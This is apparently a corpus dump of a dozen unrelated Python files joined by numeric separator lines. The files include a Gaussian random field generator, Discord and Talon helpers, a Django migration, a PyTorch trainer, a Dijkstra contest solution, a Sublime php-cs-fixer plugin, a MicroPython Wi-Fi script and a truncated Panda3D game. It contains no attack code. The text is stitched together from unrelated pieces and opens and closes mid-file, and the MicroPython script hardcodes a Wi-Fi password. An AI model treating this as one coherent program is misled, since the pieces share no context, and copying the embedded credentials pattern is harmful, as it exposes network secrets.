        _dkz = abs(_kz[1] - _kz[0])
        self.k = np.sqrt(_kx[:,np.newaxis,np.newaxis]**2 + _ky[np.newaxis,:,np.newaxis]**2 + _kz[np.newaxis,np.newaxis,:]**2)
        _box_vol = _lsim_x * _lsim_y * _lsim_z
        _pix_vol = _box_vol / (self.nx_sim * self.ny_sim * self.nz_sim)
        # Normalization between the discrete FFT convention and P(k).
        self.scale_factor = np.sqrt(_pix_vol**2 / _box_vol)

    def GenerateGRF(self, L_x, L_y, L_z, n_samples=1):
        """
        Generate Gaussian random field according to the provided geometry and power spectrum
        ----------------------------------------
        :param L_x: length of survey volume along 1st dimension; {scalar}
        :param L_y: length of survey volume along 2nd dimension; {scalar}
        :param L_z: length of survey volume along 3rd (LOS) dimension; {scalar}
        :param n_samples: number of GRF realizations to generate
        :return:
        """
        self.fn = 'grf_samples_x%dy%dz%d_N%d' % (self.n_ch_x, self.n_ch_y, self.n_ch_z, n_samples)
        if not callable(self.PowerSpectrum): raise TypeError('Input power spectrum must be a callable function of k!')
        self.survey_maps = np.zeros((self.n_ch_x, self.n_ch_y, self.n_ch_z, n_samples))
        print('\nGenerating x (real space) and k (fourier space) grids...')
        self.SetGrid(L_x=L_x, L_y=L_y, L_z=L_z)
        print('\nReading in power spectrum...')
        try:
            Pk = self.PowerSpectrum(self.k)
            assert Pk[Pk >= 0.0].size == Pk.size
        except Exception as exc:
            # Was a bare ``except`` raising ValueError('Oops!'); give a
            # diagnosable message and preserve the original cause.
            raise ValueError('input power spectrum must be evaluable on the '
                             'k grid and non-negative everywhere') from exc
        print('\nGenerating GRF realizations...')
        if self.n_ch_y == 1:
            for i in range(n_samples):
                # Generate real and imaginary parts (fixed per-sample seed for
                # reproducibility).
                rand = np.random.RandomState(seed=(42 + i))
                realspace_vec_r = rand.normal(loc=0.0, scale=1.0, size=self.r.shape)
                realspace_vec_i = rand.normal(loc=0.0, scale=1.0, size=self.r.shape)
                realspace_map = (realspace_vec_r + realspace_vec_i * 1.0j)
                fourierspace_map = np.fft.fftn(realspace_map) / np.sqrt(self.nx_sim * self.ny_sim * self.nz_sim)
                # Color the white noise by sqrt(P(k)) and zero the DC mode.
                ft_map = np.sqrt(Pk) * fourierspace_map / self.scale_factor
                ft_map[0, 0, 0] = 0.0
                full_map = np.fft.ifftn(ft_map)
                full_map = np.real(full_map)
                # Cut the survey slab out of the larger simulation box.
                survey_map = full_map[int(self.npix_cen-(self.n_ch_x//2)):int(self.npix_cen+(self.n_ch_x//2)), self.npix_cen, :]
                self.survey_maps[:, 0, :, i] = survey_map
                print('%d out of %d realizations completed!'%(i+1, n_samples))
            self.survey_map_coords = [self.xs[int(self.npix_cen-(self.n_ch_x//2)):int(self.npix_cen+(self.n_ch_x//2))], None, self.zs]
        else:
            raise NotImplementedError('help!')
        self.save()
        print('\n--- DONE ---\n')

    def save(self, format='npz'):
        """
        Save derived window functions to file
        ----------------------------------------
        :param format: format of output file; {str}
        """
        root = os.getenv('STARTERLITE')
        if root is None:
            # Fail with a clear message instead of the original opaque
            # ``TypeError: unsupported operand`` when the env var is unset.
            raise EnvironmentError('STARTERLITE environment variable is not set')
        _path = root + '/output/grf/%s.%s' % (self.fn, format)
        _wf_dict = {'grf': self.survey_maps, 'coords': self.survey_map_coords}
        np.savez(_path, **_wf_dict)

    def GetObsPS2D_NoAvg(self, ps3d, T_matrix_path):
        """
        Obtain the observed 2D PS for a given true, 3D PS and a projection (WF) matrix
        ----------------------------------------
        :param ps3d: true spatial power spectrum; {callable function}
        :param T_matrix_path: path to transfer matrix; {str}
        :return: observed power spectrum and bin edges
        """
        T_matrix_data = np.load(T_matrix_path)
        T_matrix = T_matrix_data['T_matrix']  # of size (NKx * NKz, Nkbins)
        k3d_bins = T_matrix_data['k3d_bins']
        K2D_bins = T_matrix_data['K2D_matrix']  # of size (NKx * NKz, 2)
        PS2D_from_mat = np.matmul(T_matrix, ps3d(k3d_bins))
        return K2D_bins, PS2D_from_mat
"""A collection of utility functions for performing typing and error checking on discord.ext.commands.Context objects."""
from typing import List, Optional, Union
# Third party imports
import discord
from discord.ext import commands
# First party imports
import botpumpkin.discord.guild as guild_util
# *** get_guild *************************************************************
def get_guild(context: commands.Context) -> discord.Guild:
    """Return the guild from the given context.

    Args:
        context (commands.Context): The context to return the guild from.

    Raises:
        ValueError: Raised if the context contains no guild.

    Returns:
        discord.Guild: The guild from the given context.
    """
    guild: Optional[discord.Guild] = context.guild
    if guild is None:
        raise ValueError("context.guild has no value")
    return guild
# *** get_guild_channels ****************************************************
def get_guild_channels(context: commands.Context) -> List[Union[discord.TextChannel, discord.VoiceChannel, discord.CategoryChannel, discord.StoreChannel]]:
    """Return a list of all channels from the given context.

    Args:
        context (commands.Context): The context to return all channels from.

    Raises:
        ValueError: Raised if the guild from the given context has no list of channels.

    Returns:
        List[Union[discord.TextChannel, discord.VoiceChannel, discord.CategoryChannel, discord.StoreChannel]]: The list of channels from the given context.
    """
    channels: List[Union[discord.TextChannel, discord.VoiceChannel, discord.CategoryChannel, discord.StoreChannel]] = get_guild(context).channels
    # Defensive check kept from the original; a guild's channel list is not
    # expected to be None in practice.
    if channels is None:
        raise ValueError("context.guild.channels has no value")
    return channels
# *** get_channel ***********************************************************
def get_channel(context: commands.Context) -> discord.TextChannel:
    """Return the channel from the given context.

    Args:
        context (commands.Context): The context to return the channel from.

    Raises:
        ValueError: Raised if the channel is not a TextChannel, which means the channel is not from a guild.

    Returns:
        discord.TextChannel: The channel from the given context.
    """
    channel: Union[discord.TextChannel, discord.DMChannel, discord.GroupChannel] = context.channel
    if not isinstance(channel, discord.TextChannel):
        raise ValueError("Channel is not from guild")
    return channel
# *** get_channel_by_name ***************************************************
def get_channel_by_name(context: commands.Context, channel_name: str) -> discord.TextChannel:
    """Return the channel from the list of channels in the given context that has the given name.

    Args:
        context (commands.Context): The context to return the channel from.
        channel_name (str): The name of the channel to return.

    Returns:
        discord.TextChannel: The channel with the given name from the given context.
    """
    # Delegates to the guild-level helper after extracting (and validating) the guild.
    return guild_util.get_channel_by_name(get_guild(context), channel_name)
# *** get_author ************************************************************
def get_author(context: commands.Context) -> discord.Member:
    """Return the member who sent the message for the given context.

    Args:
        context (commands.Context): The context to return the author from.

    Raises:
        ValueError: Raised if the author is not a guild member (i.e. ``context.author`` is a plain ``discord.User``).

    Returns:
        discord.Member: The author for the given context.
    """
    author: Union[discord.User, discord.Member] = context.author
    if not isinstance(author, discord.Member):
        raise ValueError("Author is not from guild")
    return author
| 3,679 | 980 |
import typing
import os
import json
from talon import Module, Context, canvas, screen, ui, ctrl, settings
from talon.skia import Paint, Rect
from talon.types.point import Point2d
mod = Module()  # declares the user.* actions, captures and tags below
ctx = Context()
# This tag gates the grid voice commands; it is set/cleared by
# fine_grid_activate / fine_grid_close.
mod.tag('fine_grid_enabled', desc='Tag enables fine grid commands')
class FineMouseGrid:
    """A 36x36 labeled overlay grid (letters a-z plus digits 0-9 on each axis)
    for voice-driven mouse positioning. Speaking a row/column pair moves the
    pointer; zooming shrinks the grid around a cell for finer targeting."""

    ZOOM_RATIO = 0.6  # fraction of the current rect kept by each zoom step

    def __init__(self):
        self.screen = None
        self.mcanvas = None
        self.rect = None     # region the grid currently covers (None = full screen)
        self.active = False  # whether the overlay is currently drawn
        letters = [chr(97 + i) for i in range(26)]
        numbers = [str(i) for i in range(10)]
        self.columns = letters + numbers
        self.rows = letters + numbers

    def setup(self, *, screen_num: int = None):
        """Create (or recreate) the overlay canvas on the chosen screen."""
        screens = ui.screens()
        # each if block here might set the rect to None to indicate failure
        if screen_num is not None:
            screen = screens[screen_num % len(screens)]
        else:
            screen = screens[0]
        if not self.rect:
            rect = screen.rect
            self.rect = rect.copy()
        self.screen = screen
        if self.mcanvas is not None:
            self.mcanvas.close()
        self.mcanvas = canvas.Canvas.from_screen(screen)
        self.mcanvas.register("draw", self.draw)
        self.mcanvas.freeze()

    def draw(self, canvas):
        """Paint every "rowcol" label, centered in its cell, over self.rect."""
        def draw_text(offset_x, offset_y, width, height):
            row_height = height / len(self.rows)
            column_width = width / len(self.columns)
            canvas.paint.text_align = canvas.paint.TextAlign.CENTER
            canvas.paint.textsize = 16
            for row, row_char in enumerate(self.rows):
                for col, col_char in enumerate(self.columns):
                    coordinate_x = offset_x + column_width * (col + 0.5)
                    coordinate_y = offset_y + row_height * (row + 0.5)
                    text_string = f"{row_char}{col_char}"
                    text_rect = canvas.paint.measure_text(text_string)[1]
                    # Translucent backdrop so labels stay legible on any background.
                    background_rect = text_rect.copy()
                    background_rect.center = Point2d(
                        coordinate_x,
                        coordinate_y,
                    )
                    background_rect = background_rect.inset(-4)
                    canvas.paint.color = "9999994f"
                    canvas.paint.style = Paint.Style.FILL
                    canvas.draw_rect(background_rect)
                    canvas.paint.color = "00ff008f"
                    canvas.draw_text(
                        text_string,
                        coordinate_x,
                        coordinate_y + text_rect.height / 2,
                    )
        draw_text(self.rect.x, self.rect.y, self.rect.width, self.rect.height)
        self.active = True

    def close(self):
        """Tear down the overlay canvas."""
        self.mcanvas.unregister("draw", self.draw)
        self.mcanvas.close()
        self.mcanvas = None
        self.active = False

    def reset(self):
        """Forget any zoom and redraw over the whole screen."""
        self.rect = None
        self.redraw()

    def redraw(self):
        self.close()
        self.setup()
        self.draw(self.mcanvas)

    def get_coordinate(self, row: str, column: str):
        """Return the (x, y) screen position at the center of the named cell."""
        column_index = self.columns.index(column)
        row_index = self.rows.index(row)
        x = self.rect.x + self.rect.width * (column_index + 0.5) / len(self.columns)
        y = self.rect.y + self.rect.height * (row_index + 0.5) / len(self.rows)
        return x, y

    def go_coordinate(self, row: str, column: str):
        """Move the mouse pointer to the center of the named cell."""
        ctrl.mouse_move(*self.get_coordinate(row, column))

    def zoom(self, row: str, column: str):
        """Shrink the grid to ZOOM_RATIO of its size, centered (clamped to the
        current rect) on the named cell, then redraw."""
        x, y = self.get_coordinate(row, column)
        xnew_min = self.rect.x
        xnew_max = self.rect.x + (1 - self.ZOOM_RATIO)*self.rect.width
        xnew = x - 0.5*self.ZOOM_RATIO*self.rect.width
        self.rect.x = max(min(xnew, xnew_max), xnew_min)
        ynew_min = self.rect.y
        # BUGFIX: this local was misspelled ``ynew_may`` in the original.
        ynew_max = self.rect.y + (1 - self.ZOOM_RATIO)*self.rect.height
        ynew = y - 0.5*self.ZOOM_RATIO*self.rect.height
        self.rect.y = max(min(ynew, ynew_max), ynew_min)
        self.rect.width = self.ZOOM_RATIO*self.rect.width
        self.rect.height = self.ZOOM_RATIO*self.rect.height
        self.redraw()
# Module-level singleton manipulated by the voice actions below.
grid = FineMouseGrid()

@mod.capture(rule="(<user.letter> | <user.number_key>) (<user.letter> | <user.number_key>)")
def coordinate(m) -> str:
    "Two spoken grid characters (row then column), joined as 'row,column'."
    return ','.join(m)
@mod.action_class
class GridActions:
    def fine_grid_activate():
        """activate chess board"""
        # Enabling the tag turns on the grid-specific voice commands.
        ctx.tags = ['user.fine_grid_enabled']
        grid.rect = None  # forget any previous zoom; cover the full screen
        if not grid.mcanvas:
            grid.setup()
        grid.draw(grid.mcanvas)

    def fine_grid_close():
        """Close the chessboard"""
        print(ctx.tags)
        grid.close()
        ctx.tags = []  # disable the grid-specific voice commands again

    def go_coordinate(coordinate: str):
        """select coordinate"""
        print(coordinate)
        # ``coordinate`` is "row,column" as produced by the capture above.
        row, column = coordinate.split(',')
        grid.go_coordinate(row, column)

    def zoom(coordinate: str):
        """zoom"""
        row, column = coordinate.split(',')
        grid.zoom(row, column)

    def fine_grid_reset():
        """reset grid to original state"""
        grid.reset()
| 5,180 | 1,650 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2017-10-11 13:10
from __future__ import unicode_literals
from django.db import migrations
import molo.surveys.blocks
import wagtail.core.blocks
class Migration(migrations.Migration):
    # Auto-generated by Django 1.9.13 (2017-10-11): adds sort_order-based
    # Meta ordering to both form-field models and rebuilds their
    # ``skip_logic`` StreamFields. Applied migrations must not be hand-edited.

    dependencies = [
        ('surveys', '0013_add_streamfield_for_skip_logic'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='molosurveyformfield',
            options={'ordering': ['sort_order']},
        ),
        migrations.AlterModelOptions(
            name='personalisablesurveyformfield',
            options={'ordering': ['sort_order'], 'verbose_name': 'personalisable form field'},
        ),
        migrations.AlterField(
            model_name='molosurveyformfield',
            name='skip_logic',
            field=molo.surveys.blocks.SkipLogicField([(b'skip_logic', wagtail.core.blocks.StructBlock([(b'choice', wagtail.core.blocks.CharBlock()), (b'skip_logic', wagtail.core.blocks.ChoiceBlock(choices=[(b'next', b'Next default question'), (b'end', b'End of survey'), (b'question', b'Another question'), (b'survey', b'Another survey')])), (b'survey', wagtail.core.blocks.PageChooserBlock(required=False, target_model='surveys.MoloSurveyPage')), (b'question', molo.surveys.blocks.QuestionSelectBlock(help_text=b'Please save the survey as a draft to populate or update the list of questions.', required=False))]))], blank=True, verbose_name=b'Answer options'),
        ),
        migrations.AlterField(
            model_name='personalisablesurveyformfield',
            name='skip_logic',
            field=molo.surveys.blocks.SkipLogicField([(b'skip_logic', wagtail.core.blocks.StructBlock([(b'choice', wagtail.core.blocks.CharBlock()), (b'skip_logic', wagtail.core.blocks.ChoiceBlock(choices=[(b'next', b'Next default question'), (b'end', b'End of survey'), (b'question', b'Another question'), (b'survey', b'Another survey')])), (b'survey', wagtail.core.blocks.PageChooserBlock(required=False, target_model='surveys.MoloSurveyPage')), (b'question', molo.surveys.blocks.QuestionSelectBlock(help_text=b'Please save the survey as a draft to populate or update the list of questions.', required=False))]))], blank=True, verbose_name=b'Answer options'),
        ),
    ]
| 2,261 | 749 |
from ..super import SupTrainer
from tqdm import tqdm
import torch
from jdit.optimizer import Optimizer
from jdit.model import Model
from jdit.dataset import DataLoadersFactory
class SupSingleModelTrainer(SupTrainer):
    """ This is a Single Model Trainer.
    It means you only have one model.
    input, ground_truth
    output = model(input)
    loss(output, ground_truth)
    """

    def __init__(self, logdir, nepochs, gpu_ids_abs, net: Model, opt: Optimizer, datasets: DataLoadersFactory):
        super(SupSingleModelTrainer, self).__init__(nepochs, logdir, gpu_ids_abs=gpu_ids_abs)
        self.net = net
        self.opt = opt
        self.datasets = datasets
        # Populated per-iteration during training/validation.
        self.fixed_input = None
        self.input = None
        self.output = None
        self.ground_truth = None

    def train_epoch(self, subbar_disable=False):
        """Run one pass over ``loader_train``, stepping the optimizer via the
        parent's ``_train_iteration`` and visualizing the first batch."""
        for iteration, batch in tqdm(enumerate(self.datasets.loader_train, 1), unit="step", disable=subbar_disable):
            self.step += 1
            self.input, self.ground_truth = self.get_data_from_batch(batch, self.device)
            self.output = self.net(self.input)
            self._train_iteration(self.opt, self.compute_loss, csv_filename="Train")
            if iteration == 1:
                # Only the first batch of each epoch is visualized.
                self._watch_images("Train")

    def get_data_from_batch(self, batch_data: list, device: torch.device):
        """ Load and wrap data from the data loader.

        Split your one batch data to specify variable.
        Example::

            # batch_data like this [input_Data, ground_truth_Data]
            input_cpu, ground_truth_cpu = batch_data[0], batch_data[1]
            # then move them to device and return them
            return input_cpu.to(self.device), ground_truth_cpu.to(self.device)

        :param batch_data: one batch data load from ``DataLoader``
        :param device: A device variable. ``torch.device``
        :return: input Tensor, ground_truth Tensor
        """
        input_tensor, ground_truth_tensor = batch_data[0], batch_data[1]
        return input_tensor, ground_truth_tensor

    def _watch_images(self, tag: str, grid_size: tuple = (3, 3), shuffle=False, save_file=True):
        """ Show images in tensorboard

        To show images in tensorboad. If want to show fixed input and it's output,
        please use ``shuffle=False`` to fix the visualized data.
        Otherwise, it will sample and visualize the data randomly.

        Example::

            # show input
            self.watcher.image(self.input,
                               self.current_epoch,
                               tag="%s/input" % tag,
                               grid_size=grid_size,
                               shuffle=shuffle,
                               save_file=save_file)

        :param tag: tensorboard tag
        :param grid_size: A tuple for grad size which data you want to visualize
        :param shuffle: If shuffle the data.
        :param save_file: If save this images.
        :return:
        """
        self.watcher.image(self.output,
                           self.current_epoch,
                           tag="%s/output" % tag,
                           grid_size=grid_size,
                           shuffle=shuffle,
                           save_file=save_file)
        self.watcher.image(self.ground_truth,
                           self.current_epoch,
                           tag="%s/ground_truth" % tag,
                           grid_size=grid_size,
                           shuffle=shuffle,
                           save_file=save_file)

    def compute_loss(self) -> (torch.Tensor, dict):
        """ Rewrite this method to compute your own loss.

        Use self.input, self.output and self.ground_truth to compute loss.
        You should return a **loss** for the first position.
        You can return a ``dict`` of loss that you want to visualize on the second position.like

        Example::

            var_dic = {}
            var_dic["LOSS"] = loss_d = (self.output ** 2 - self.groundtruth ** 2) ** 0.5
            return loss_d, var_dic

        """
        # BUGFIX: the original returned an annotated-but-unbound local
        # (``loss: torch.Tensor``), so calling the un-overridden hook raised a
        # confusing ``NameError``. Fail explicitly: this is an abstract hook.
        raise NotImplementedError("compute_loss() must be overridden by subclasses")

    def compute_valid(self) -> dict:
        """ Rewrite this method to compute your validation values.

        Use self.input, self.output and self.ground_truth to compute valid loss.
        You can return a ``dict`` of validation values that you want to visualize.

        Example::

            # It will do the same thing as ``compute_loss()``
            var_dic, _ = self.compute_loss()
            return var_dic

        """
        # It will do the same thing as ``compute_loss()``
        var_dic, _ = self.compute_loss()
        return var_dic

    def valid_epoch(self):
        """Validate model each epoch.

        It will be called when each epoch of training finishes: averages the
        per-batch ``compute_valid()`` dicts over ``loader_valid``, logs the
        scalars, visualizes the last batch, and restores train mode.
        """
        avg_dic: dict = {}
        self.net.eval()
        for iteration, batch in enumerate(self.datasets.loader_valid, 1):
            self.input, self.ground_truth = self.get_data_from_batch(batch, self.device)
            with torch.no_grad():
                self.output = self.net(self.input)
                dic: dict = self.compute_valid()
            if avg_dic == {}:
                avg_dic: dict = dic
            else:
                # accumulate per-key sums; averaged below
                for key in dic.keys():
                    avg_dic[key] += dic[key]
        for key in avg_dic.keys():
            avg_dic[key] = avg_dic[key] / self.datasets.nsteps_valid
        self.watcher.scalars(avg_dic, self.step, tag="Valid")
        self.loger.write(self.step, self.current_epoch, avg_dic, "Valid", header=self.current_epoch <= 1)
        self._watch_images(tag="Valid")
        self.net.train()

    def test(self):
        """Optional test hook; no-op in this base trainer."""
        pass
| 7,355 | 2,124 |
import heapq
import sys
primes = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53]
# bounds[i] = product of the first i primes; a town id in [bounds[i], bounds[i+1])
# is worth i gold.
bounds = [1]
for pr in primes:
    bounds.append(bounds[-1]*pr)

def gold(town_id):
    """Return the gold value of a town: the number of leading primes whose
    running product is <= town_id.

    Uses binary search over the sorted ``bounds`` list instead of the original
    linear scan: O(log n), and — unlike the original — it cannot raise
    IndexError when town_id >= bounds[-1].
    """
    import bisect  # local import keeps the shared import header untouched
    return bisect.bisect_right(bounds, town_id) - 1
def solve():
    # Python 2 code (raw_input/xrange/print statement/sys.maxint).
    # Reads N towns and M weighted edges, then runs Dijkstra from the town
    # with the smallest id to the one with the largest id, maximizing gold
    # collected among shortest paths; prints that maximum gold.
    N, M = [int(i) for i in raw_input().split()]
    ids = [int(raw_input()) for _ in xrange(N)]
    town_gold = {town_id: gold(town_id) for town_id in ids}
    adj = {}
    for i in ids:
        adj[i] = []
    for _ in xrange(M):
        i, j, w = [int(i) for i in raw_input().split()]
        adj[i].append((j, w))
        adj[j].append((i, w))
    start, end = min(ids), max(ids)
    visited = set()
    # NOTE(review): nothing ever adds to ``visited``, so both membership tests
    # below never fire and nodes may be processed repeatedly. Combined with the
    # ``>=`` relaxation, this re-pushes equal-distance paths so the heap can
    # surface the higher-gold tie — confirm the empty set is intentional.
    max_dist = sys.maxint/2
    min_dist = {town_id: max_dist for town_id in ids}
    min_dist[start] = 0
    # Heap entries: (distance, -gold collected, node); ties in distance are
    # broken in favor of more gold because of the negated second key.
    queue = [(0, -gold(start), start)]
    while queue:
        curr_dist, curr_gold, curr_node = heapq.heappop(queue)
        if curr_node in visited:
            continue
        if curr_node == end:
            print -curr_gold
            break
        for next_node, dist in adj[curr_node]:
            if next_node in visited:
                continue
            next_dist = curr_dist + dist
            if min_dist[next_node] >= next_dist:
                min_dist[next_node] = next_dist
                heapq.heappush(queue, (next_dist, curr_gold-town_gold[next_node], next_node))
def main():
    """Entry point: solve a single test case from stdin."""
    solve()
if __name__ == "__main__":
    main()
| 1,433 | 554 |
# -*- encoding: utf-8
from .utils import build_user_agent
# Common HTTP client settings.
DEFAULT_HEADERS = {
    'User-Agent': build_user_agent()
}
TIMEOUT = 1  # request timeout; presumably seconds -- TODO confirm against the HTTP client
ENCODING = 'utf-8'
RETRYS = 3  # number of retry attempts (historic misspelling kept: renaming would break callers)
RETRY_BACKOFF_FACTOR = 0.1
RETRY_STATUS_FORCELIST = frozenset([500, 502, 504])  # HTTP statuses that trigger a retry
# Auth.
OAUTH_HOST = 'open.weixin.qq.com'
# Error codes treated as an expired/invalid auth credential.
AUTH_EXPIRED_CODES = frozenset([40001, 40014, 41001, 42001])
# Pay: WeChat trade types.
TRADE_TYPE_JSAPI = 'JSAPI'  # official-account (in-chat) payment
TRADE_TYPE_NATIVE = 'NATIVE'  # QR-code payment
TRADE_TYPE_APP = 'APP'  # in-app payment
SIGN_TYPE = 'MD5'
SIGN_NONCE_STR_LEN = 32  # length of the random nonce string used when signing
| 511 | 288 |
# MicroPython boot script: connect an ESP board to Wi-Fi and prepare a
# DS18X20 temperature sensor on a OneWire bus.
try:
    # MicroPython ships the socket API as 'usocket'; fall back for CPython.
    import usocket as socket
except ImportError:
    import socket
from time import sleep
from machine import Pin
import onewire, ds18x20
import network
import esp
esp.osdebug(None)  # silence vendor OS debug output
import gc
gc.collect()

# DS18X20 sensor wired to GPIO4.
ds_pin = Pin(4)
ds_sensor = ds18x20.DS18X20(onewire.OneWire(ds_pin))

# NOTE(review): hardcoded Wi-Fi credentials -- consider loading from config.
ssid = 'ATC24'
password = 'Svalbard'

station = network.WLAN(network.STA_IF)
station.active(True)
station.connect(ssid, password)
# Busy-wait until the station is associated.
while not station.isconnected():
    pass
print('Connection successful')
print(station.ifconfig())
"""
Given two strings s and t , write a function to determine if t is an anagram of s.
Example 1:
Input: s = "anagram", t = "nagaram"
Output: true
Example 2:
Input: s = "rat", t = "car"
Output: false
Note:
You may assume the string contains only lowercase alphabets.
Follow up:
What if the inputs contain unicode characters? How would you adapt your solution to such case?
"""
from collections import Counter
class Solution:
    """Three equivalent ways to decide whether t is an anagram of s."""

    def isAnagram1(self, s, t):
        """Sort both strings and compare the sorted character lists."""
        sorted_s, sorted_t = sorted(s), sorted(t)
        return sorted_s == sorted_t

    def isAnagram2(self, s, t):
        """Count characters of each string into dicts and compare the dicts."""
        if len(s) != len(t):
            return False
        counts_s = {}
        counts_t = {}
        for ch in s:
            counts_s[ch] = counts_s.get(ch, 0) + 1
        for ch in t:
            counts_t[ch] = counts_t.get(ch, 0) + 1
        return counts_s == counts_t

    def isAnagram3(self, s, t):  # 28ms, 13MB
        """Compare Counter multisets after a cheap length check."""
        if len(s) != len(t):
            return False
        return Counter(s) == Counter(t)
| 1,070 | 368 |
import os
import re
import sublime
import sublime_plugin
import subprocess
STVER = int(sublime.version())  # Sublime Text build number as an int (compared against 3124 below)
class PHPCSFixer():
    """Runs php-cs-fixer on a file and lists the fixed files in a quick panel."""

    def __init__(self):
        self.settings = PhpCsFixerSettings()
        # Remember the active view's file so run() can default to it.
        if sublime.active_window() is not None and sublime.active_window().active_view() is not None:
            self.file = sublime.active_window().active_view().file_name()

    def run(self, file=None):
        """Fix *file* (defaults to the active view's file) if it is PHP and not ignored."""
        if file is None:
            file = self.file
        if not self.settings.isPHPFile():
            return
        if not self.settings.isAllowedExtension(file):
            return
        cmd = self.buildCommand(file)
        result = self.execute(cmd)
        self.showOutput(result)

    def buildCommand(self, file):
        """Build the php-cs-fixer command line for *file*."""
        rules = self.settings.get('rules')
        if (self.settings.get('executable')):
            cmd = [self.settings.get('executable')]
        else:
            cmd = ['php-cs-fixer']
        cmd.append('fix')
        cmd.append(os.path.normpath(file))
        cmd.append('-vvv')
        cmd.append('--using-cache=no')
        if rules is None or not rules:
            return cmd
        # Join configured rules into a single "--rules=a,b,c" argument.
        cmd.append('--rules=' + ','.join(rules))
        return cmd

    def execute(self, cmd):
        """Run *cmd* and return its combined stdout/stderr as text."""
        process = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        return process.communicate()[0].decode()

    def showOutput(self, result):
        """Parse php-cs-fixer output and show fixed files with their rules."""
        lines = re.finditer(r'.*(?P<line>\d+)\) (?P<file>.*)', result)
        files = []
        for line in lines:
            file = line.group('file')
            # Applied rules are reported in parentheses after the file name.
            rules = file[file.find("(")+1:file.find(")")]
            file = re.sub(r'\(.*?\)', '', file)
            files.append([os.path.basename(file), rules])
        sublime.active_window().show_quick_panel(files, self.onDone)

    def onDone(self, selected):
        # Quick-panel callback. Fix: the original declared (selected, self),
        # which only worked because both arguments are unused.
        return
class PhpCsFixerFixCommand(sublime_plugin.TextCommand):
    """Text command: run php-cs-fixer on the active view's file."""

    def run(self, edit):
        # Fix: Sublime calls TextCommand.run(self, edit); the original had the
        # parameters reversed and only worked because neither was used.
        PHPCSFixer().run()
class PhpCsFixerEventListener(sublime_plugin.EventListener):
    """Optionally runs the fixer every time a view is saved."""

    def on_post_save(self, view):
        # Only act when the 'on_save' setting is enabled.
        if PhpCsFixerSettings().get('on_save'):
            PHPCSFixer().run(view.file_name())
class PhpCsFixerSettings():
    """Layered settings lookup: project settings override plugin settings."""

    def __init__(self):
        window = sublime.active_window()
        if window is not None and window.active_view() is not None:
            self.sublime = window.active_view().settings()
            self.project = self.sublime.get('php-cs-fixer')
        else:
            self.sublime = {}
            self.project = {}
        self.plugin = sublime.load_settings('PHPCSFixer.sublime-settings')

    def get(self, key, default=None):
        """Return *key* from project settings, then plugin settings, else *default*."""
        project_value = None if self.project is None else self.project.get(key)
        if project_value is not None:
            return project_value
        plugin_value = self.plugin.get(key)
        if plugin_value is not None:
            return plugin_value
        return default

    def isPHPFile(self):
        """True when the active view uses a PHP syntax definition."""
        syntax = self.sublime.get('syntax')
        return syntax is not None and syntax.endswith(('PHP.tmLanguage', 'PHP.sublime-syntax'))

    def isAllowedExtension(self, filename):
        """False when *filename* ends with one of the ignored extensions."""
        ignored = self.get('ignored_extensions', [])
        return not any(filename.endswith(ext) for ext in ignored)
class PhpCsFixerOpenFileCommand(sublime_plugin.ApplicationCommand):
    """Opens a (possibly platform-templated) file; used on older Sublime builds."""

    @staticmethod
    def run(file):
        # Map Sublime's platform key to the capitalized name used in the path.
        platform_name = {
            'osx': 'OSX',
            'windows': 'Windows',
            'linux': 'Linux',
        }[sublime.platform()]
        file = file.replace('${platform}', platform_name)
        sublime.run_command('open_file', {'file': file})

    @staticmethod
    def is_visible():
        # Only shown where the edit_settings command (build 3124+) is unavailable.
        return STVER < 3124
class PhpCsFixerEditSettingsCommand(sublime_plugin.ApplicationCommand):
    """Opens the plugin settings via Sublime's built-in edit_settings command."""

    @staticmethod
    def run(**kwargs):
        sublime.run_command('edit_settings', kwargs)

    @staticmethod
    def is_visible():
        # edit_settings exists from build 3124 onward.
        return STVER >= 3124
| 4,144 | 1,267 |
class Deleter:
    """Performs deletions through a database context."""

    ####################################################################################################################
    # Constructor.
    ####################################################################################################################
    def __init__(self, db_context):
        """
        Initializes attributes.

        Parameters
        ----------
        db_context : DbContext
            The database context to work with.

        Raises
        ------
        ValueError
            If ``db_context`` is None.
        """
        ### Validate parameters. ValueError is more precise than the original
        ### bare Exception and stays compatible with callers catching Exception.
        if db_context is None:
            raise ValueError('db_context cannot be None.')
        ### Attributes from outside.
        self._db_context = db_context
| 686 | 138 |
from panda3d.core import *
from direct.gui.DirectGui import *
from direct.showbase.ShowBase import ShowBase
from noise import snoise2
import os
import random
from Block import *
# Engine configuration; the dev overrides only load in non-optimized runs.
loadPrcFile('config/general.prc')
if __debug__:
    loadPrcFile('config/dev.prc')
base = ShowBase()
# Simplex-noise terrain parameters.
octavesElev = 5
octavesRough = 2
octavesDetail = 1
freq = 16.0 * octavesElev
# world maps (x, y, z) tuples to Block instances.
world = {}
# Feature toggles.
verboseLogging = False
fancyRendering = False
wantNewGeneration = False
fillWorld = False
base.setFrameRateMeter(True)
paused = False
# Hotbar contents; slot 1 is selected initially.
inventory = [DIRT, COBBLESTONE, GLASS, GRASS, BRICKS, WOOD, LEAVES, PLANKS, STONE]
currentBlock = inventory[0]
# HUD labels showing the currently selected block.
currentSelectedText = DirectLabel(text = "Current block:", text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = aspect2d, scale = 0.05, pos = (0,0,-0.9))
currentBlockText = DirectLabel(text = blockNames[currentBlock], text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = aspect2d, scale = 0.05, pos = (0,0,-0.95))
def pause():
    """Toggle the pause state: freeze/restore mouse control, show/hide the menu."""
    global paused
    paused = not paused
    if paused:
        base.disableMouse()
        pauseScreen.showPause()
    else:
        base.enableMouse()
        pauseScreen.hide()
class PauseScreen:
    """In-game menu with three stacked screens: pause, save and load.

    Each screen is a NodePath that is stash()ed/unstash()ed to flip between
    them; `dim` is a fullscreen translucent card on render2d behind them.
    Save files are plain text lines of the form "(x, y, z):blocktype".
    """
    def __init__(self):
        self.pauseScr = aspect2d.attachNewNode("pause") # This is used so that everything can be stashed at once... except for dim, which is on render2d
        self.loadScr = aspect2d.attachNewNode("load") # It also helps for flipping between screens
        self.saveScr = aspect2d.attachNewNode("save")
        cm = CardMaker('card')
        self.dim = render2d.attachNewNode(cm.generate())
        self.dim.setPos(-1, 0, -1)
        self.dim.setScale(2)
        self.dim.setTransparency(1)
